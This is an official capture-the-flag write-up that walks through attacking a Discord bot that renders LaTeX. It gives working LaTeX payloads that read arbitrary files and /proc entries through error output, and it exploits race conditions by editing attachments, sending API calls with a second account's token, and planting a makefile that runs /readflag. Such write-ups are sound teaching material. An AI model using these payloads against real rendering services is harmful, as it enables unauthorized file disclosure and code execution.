TSJ CTF 2022 - Remote Code TeXecution Official Write-up

# TSJ CTF 2022 - Remote Code TeXecution Official Write-up This is a step-by-step tutorial of my challenge Remote Code TeXecution: Hack a Discord bot that processes $\LaTeX$ files. It was originally a black-box challenge with two parts: The first part is to leak the source code, and the second part is to achieve code execution. Due to the lack of people attempting, I decided to release the source code after a few hours. The white-box version is a lot easier, and solving part 1 is no longer a dependency of solving part 2. I released the challenge a bit too late (I was fixing issues involving asyncio and concurrent requests), and it would have had more solves (even with black-box) if I had released it earlier :/. ## Part 1: Leaking the source Intended difficulty: Medium Guessing required: A little (black-box); None (white-box) Solve count: 1 ### How to read a file We can make the bot render an arbitrary `.tex` file. Reading files in LaTeX is easy; in fact, there are already a lot of CTF contests that feature LaTeX challenges like this. However, there is a catch in this one: payloads containing backslash characters (hence those with any TeX command) will not produce any output. After some testing (or reading the code), we may observe that: - If our file doesn't compile, the bot sends an error message. - Otherwise, if our file contains a backslash, the bot tells us it's insecure. - Otherwise, we see the rendered output. There is a logic error: If we send a file with backslashes that doesn't compile, its error output still gets shown. This means that we can still use commands, but instead of using `\input` to leak information, we should print stuff to the error output. One way to do this is to produce a custom error message with `\PackageError`. Another way is to know that `pdflatex` prints errors to stdout in a special format, so we can do something like `\typeout{! abc}` to trick the bot into thinking that `abc` is an error. We may utilize TeX's powerful control flow to read a file like this: ```latex \catcode0=10 % make \0 not produce a syntax error \catcode9=11 % make \t indents work correctly \def\n{/path/to/file} \def\l{69} \def\r{420} \newread\file \openin\file=\n \newcounter{line} \makeatletter \@whilenum\value{line} < \r \do { \read\file to \fileline \stepcounter{line} \ifnum\value{line} > \l \typeout{! \fileline} \fi } ``` The above payload makes the bot print the 69^th^ to 419^th^ line of the file `/path/to/file`. There are many other ways to do the same thing, and you can find them in other CTF write-ups. ### Which file to read? Knowing how to get the contents of a file, the rest is just to determine the bot's file name. There are also many ways to do this, mostly using [procfs](https://wiki.archlinux.org/title/Procfs). For example, 1. We can find with brute-force the bot's PID: for each number `PID`, check if `/proc/{PID}/cmdline` exists and print it to see if it's the one we want. 2. We know that the bot must be an ancestor process of LaTeX, so we can read `/proc/self/status` to see its parent's PID, and read `/proc/{PPID}/status` to see the parent's PPID, and so on, until we reach the PID 1 process. One of them is the answer. The second way can all be done in LaTeX: ```latex % make '\t' a token, ignore '\r', and make '\0' a space \catcode9=\active \catcode13=14 \catcode0=10 \makeatletter \newcommand\stripprefix[6]{} % reads the parent pid of the argument and stores it in \@pid \newcommand\getppid[1]{ \openin\file=/proc/#1/status \@for\tmp:={1,2,3,4,5,6}\do { \read\file to\fileline } \read\file to\ppidline \def\@pid{\expandafter\stripprefix\ppidline} \closein\file } % prints /proc/\@pid/cmdline \newcommand\print{ \openin\file=/proc/\@pid/cmdline \read\file to\cmdline \typeout{! \unexpanded\expandafter{\cmdline}} \closein\file } \newread\file \getppid{self}\print \loop \getppid{\@pid}\print \ifnum\@pid > 1 \repeat ``` The above yields: ``` ! /bin/sh -c pdflatex -no-shell-escape -jobname output __document.tex | awk '/^ ! /,/^\?/' ! /usr/bin/make -s -C sandbox/ff8e8c9ec1904d9fc299_468420931812065281 -f makefi le1 stage1 ! /usr/bin/sudo -u latex /usr/bin/make -s -C sandbox/ff8e8c9ec1904d9fc299_46842 0931812065281 -f makefile1 stage1 ! python3 /workdir/4sQ6xQxtIyLHwuLLjjME.py ! /bin/bash ./entrypoint.sh ) (./output.aux) ) No pages of output. Transcript written on output.log. Output PDF not found. ``` Which means the bot's file is `/workdir/4sQ6xQxtIyLHwuLLjjME.py`. ## Part 2: Arbitrary code execution Intended difficulty: bruh Guessing required: A little Solve count: 0 ### A race condition The second part is not actually a LaTeX challenge, since I believe you cannot execute code with `-no-shell-escape`. As the hint suggests, we should probably upload/create our own makefile. Let's check the different ways this might be possible. 1. Use LaTeX's `\openout` to write a file. However, according to the manual: > If the file does not have an extension then TeX will add a `.tex`. > So we can only create a `makefile.tex`, which doesn't work. 2. `/upload` a makefile. The bot checks file extensions, plus Discord replaces all special characters in filenames, so this doesn't work. 3. Upload a makefile using the direct message feature. Same as 2, it doesn't work. Unless...? There is a TOCTOU bug in 3.: The bot checks the extension first, and then waits for the user to press the "Yes" button. We may edit the file between these events to circumvent the check. We can't edit message attachments in the Discord client, but it's a thing in the API (see [this](https://discord.com/developers/docs/resources/channel#edit-message) and [this](https://discord.com/developers/docs/reference#editing-message-attachments)) -- which means it's actually possible to upload a file with the name `makefile1` or `makefile2`. ### Another race condition The next step is to prevent our makefile from getting overwritten immediately. Let's analyze what the bot does after we select an option: | User selects the option "White Text" for `foo.tex` | | -------- | | Bot downloads the attachment `foo.tex` | | Bot creates the files `__document.tex` and `makefile2` | | Bot runs `make -f makefile2 stage1` | | Bot runs `make -f makefile2 stage2` | | Bot sends output | We may notice an exploitable race condition in this process. Consider when a user sends two commands in quick succession, and this happens: | User selects the option "White Text" for `foo.tex` | User selects the option "White Background" for `makefile2` | | -------- | -------- | | Bot downloads the attachment `foo.tex` | | | Bot creates the files `__document.tex` and `makefile2` | | | Bot runs `make -f makefile2 stage1` | | | | <span style="color:red;">Bot downloads the attachment `makefile2`</span> | | | Bot creates the files `__document.tex` and `makefile1` | | | Bot runs `make -f makefile1 stage1` | | <span style="color:red;">Bot runs `make -f makefile2 stage2`</span> | | | | Bot runs `make -f makefile1 stage2` | | | Bot sends output | | Bot sends output | | It runs the makefile we supplied! This requires the files to all be in the same working directory, so the commands' issuers should be the same. Unfortunately, looking at the code, we can see that the procedure is protected by a mutex lock: ```python lock = self.locks.get(interaction.user) if lock == None: lock = self.locks[interaction.user] = asyncio.Lock() async with lock: # ... # working dir is a hash of ctx.user.id await self.process_file(ctx.user.id, self.user_files[ctx.user], makefile) # ... ``` which means that our exploit won't work. Unless...? ### Discord, what the fuck? Let's look more closely at the snippet above. The working directory and files depends on `ctx.user`, and which mutex is used depends on `interaction.user`. Wait, that's not necessarily the same person! `ctx.user` is the user who used the `/render` command, and `interaction.user` is the user who clicked an option in the select menu. Suppose there are two users `user1` and `user2`. When `user1` uses the `/render` command in a direct message, the bot sends this: ![](https://i.imgur.com/qfZzSpw.png) Selecting an option is equivalent to sending an API request like this: ```sh curl -X POST https://discord.com/api/v9/interactions \ -H 'authorization: <user1 auth token>' \ -H 'content-type: application/json' \ -d $payload ``` where `payload` is: ```json { "type": 3, "nonce": "...", "guild_id": "...", "channel_id": "...", "message_flags": 64, "message_id": "...", "application_id": "...", "session_id": "...", "data": { "component_type": 3, "custom_id": "...", "type": 3, "values": ["t"] } } ``` and we get the desired output from the bot: ![](https://i.imgur.com/uEV4WTd.png) Discord says "Only you can see this" under all messages, but is that true? Well, let's try sending the same API request above but with `user2`'s token instead, and change the nonce to another random number. We get... `400 Bad Request {"message": "Unknown Channel", "code": 10003}`. It says "Unknown Channel", so let's repeat this entire thing in some channel in the TSJ CTF server, which is visible to both users. This time we get... `204 No Content`??? This means that `user2` has successfully sent an interaction to `user1`'s command response without actually being able to see it. After sending the API request, `user2` can in fact see the output of `user1`'s file: ![](https://i.imgur.com/tU82dfd.png) This shows that `ctx.user` and `interaction.user` in the previous section can indeed be two different people, thus enabling our race condition exploit. To sum up, the full exploit is as follows: 1. `/upload` a file containing an infinite loop: ```latex \loop\iftrue\repeat ``` 2. Send a direct message containing any `.tex` file. 3. Edit the message in step 2 to contain an attachment `makefile2` that says ```makefile stage2: /readflag sleep 8 rm -f output.png ``` 4. `/render` in the TSJ CTF server and select "White Text". 5. Press the "Yes" button in the bot's reply in step 2. 6. Using another account's authorization token, select the "White Background" option in step 4. Steps 4 to 6 have to be done within 10 seconds (before the infinite loop gets killed), and can be carried out either by hand or by using a script. Note that you should pause a bit between the steps because of latency. ## Conclusions - LaTeX is weird. - Python's `asyncio` is weird. - Discord API is weird.